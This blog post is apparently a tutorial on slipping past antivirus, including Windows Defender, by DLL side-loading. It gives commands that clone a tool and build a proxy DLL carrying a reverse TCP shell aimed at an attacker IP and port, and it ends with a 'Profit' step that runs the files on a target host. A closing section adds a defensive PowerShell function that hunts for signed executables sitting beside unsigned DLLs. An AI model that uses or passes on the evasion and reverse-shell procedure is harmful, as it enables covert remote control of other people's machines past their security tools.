Bypassing AV's using DLL Side-Loading

In one of my earlier blog posts, I talked about and released a working PowerShell script to dump DLL function calls from a signed executable, compile a “proxy” DLL and successfully run a DLL side-loading attack. DLL side-loading allows you to make “safe” and signed applications run whatever code you want (applications that load DLLs in an unsafe way, that is). This time we will look into using this to bypass AVs, including the latest version of Windows Defender. We are working out of the same context as the earlier blog post, so go read that first! To make this as easy as possible, we are going to implement a simple reverse TCP connection in C++ inside the “proxy” DLL (B), instead of using an extra third DLL (C).

DLL SideLoading

C++ source for a simple reverse shell to run at the entry point, slightly modified from sh3llc0d3r1337's GitHub.

Let’s get started.

Generate “proxy” DLL

Note: Make sure you have the 2019 version of “Build Tools for Visual Studio” installed.

Clone my DLL-Sideloading project from GitHub, load the PowerShell script into the session and execute the following function. The repository contains a binary copy of “DLL Export Viewer”, a great freeware tool published by Nir Sofer. Our PowerShell script uses this application to dump the function call names from the DLL. Feel free to download the binary directly from NirSoft and put it in place if you don’t feel comfortable using the one provided by me.

    git clone https://github.com/SkiddieTech/DLLSideloader
    cd DLLSideloader
    . ./DLLSideloader.ps1
    Invoke-AVBypassDLLSideLoad libcurl.dll 192.168.1.20 1337

The PowerShell script will (hopefully) run as shown below.

[Image: PowerShell output]

The following files are generated.

[Image: files after run]

Profit

After moving the files over to the target host, make sure they are all in the same directory and execute the application!
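
From the defender's side, the layout this post ends with (a validly signed executable with a freshly compiled DLL in the same directory) is something you can hunt for. The function below is an added example, not part of the DLLSideloader project; the name `Find-SideLoadCandidate`, the default search paths, and the premise that the proxy DLL carries no valid Authenticode signature are assumptions.

```powershell
# Added example (not from the DLLSideloader project): flag directories where a
# validly signed EXE sits next to a DLL that is NOT validly signed.
function Find-SideLoadCandidate {
    [CmdletBinding()]
    param(
        # Directories to sweep; these defaults are assumptions, tune per environment.
        [string[]]$Path = @($env:TEMP, "$env:USERPROFILE\Downloads", $env:ProgramData)
    )
    foreach ($root in $Path) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        # Group executables by their parent directory so each folder is checked once.
        Get-ChildItem -LiteralPath $root -Recurse -File -Filter *.exe -ErrorAction SilentlyContinue |
            Group-Object DirectoryName | ForEach-Object {
                $dir = $_.Name
                # Keep only executables with a valid signature (the "safe" host binary).
                $signedExe = $_.Group | Where-Object {
                    (Get-AuthenticodeSignature -LiteralPath $_.FullName).Status -eq 'Valid'
                }
                if (-not $signedExe) { return }   # no signed host here, next directory
                Get-ChildItem -LiteralPath $dir -File -Filter *.dll -ErrorAction SilentlyContinue |
                    ForEach-Object {
                        $sig = Get-AuthenticodeSignature -LiteralPath $_.FullName
                        if ($sig.Status -ne 'Valid') {
                            # Report enough context to triage: who would load it, and what it is.
                            [pscustomobject]@{
                                Directory  = $dir
                                SignedExe  = ($signedExe.Name -join ', ')
                                Dll        = $_.Name
                                DllStatus  = $sig.Status   # NotSigned, HashMismatch, ...
                                DllSha256  = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
                                DllWritten = $_.LastWriteTimeUtc
                            }
                        }
                    }
            }
    }
}

# Sweep the default locations and show the findings as a table.
Find-SideLoadCandidate | Format-Table -AutoSize
```

Legitimate software also ships unsigned DLLs next to signed executables, so treat hits as leads and prioritise user-writable directories and recent write times.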